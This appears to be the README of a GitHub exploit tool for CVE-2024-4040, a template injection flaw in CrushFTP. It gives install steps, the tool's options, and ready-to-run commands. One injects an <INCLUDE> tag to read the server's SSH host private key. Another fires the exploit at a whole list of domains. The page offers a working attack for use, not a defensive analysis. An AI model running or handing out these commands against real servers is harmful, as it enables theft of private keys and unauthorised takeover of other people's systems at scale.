/CVE-2024-4040

A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.

Primary LanguagePython

CVE-2024-4040

A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.

INSTALLATION

git clone https://github.com/gotr00t0day/CVE-2024-4040.git

cd CVE-2024-4040

pip3 instrall -r requirements.txt

USAGE

usage: CVE-2024-4040.py [-h] [-t TARGET] [-f FILE] [-d DOMAINS]

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target to scan
  -f FILE, --file FILE  file to fetch
  -d DOMAINS, --domains DOMAINS
                        file containing list of domains

# MAKE SURE YOU USE THE <INCLUDE> TAG OR ANY OTHER TAG TO EXPLOIT THE TARGET, SOMETIMES YOU DONT NEED ANY TAGS.

# Exploit a target

python3 CVE-2024-4040.py -t http://TARGET:8080 -f "<INCLUDE>ssh_host_rsa_key</INCLUDE>"

# Exploit a list of targets

python3 CVE-2024-4040.py -d ~/list.txt -f %hostname%

ANALYSIS

Please read ATTACKERKB ANALYSIS for a better understanding on how to use this exploit.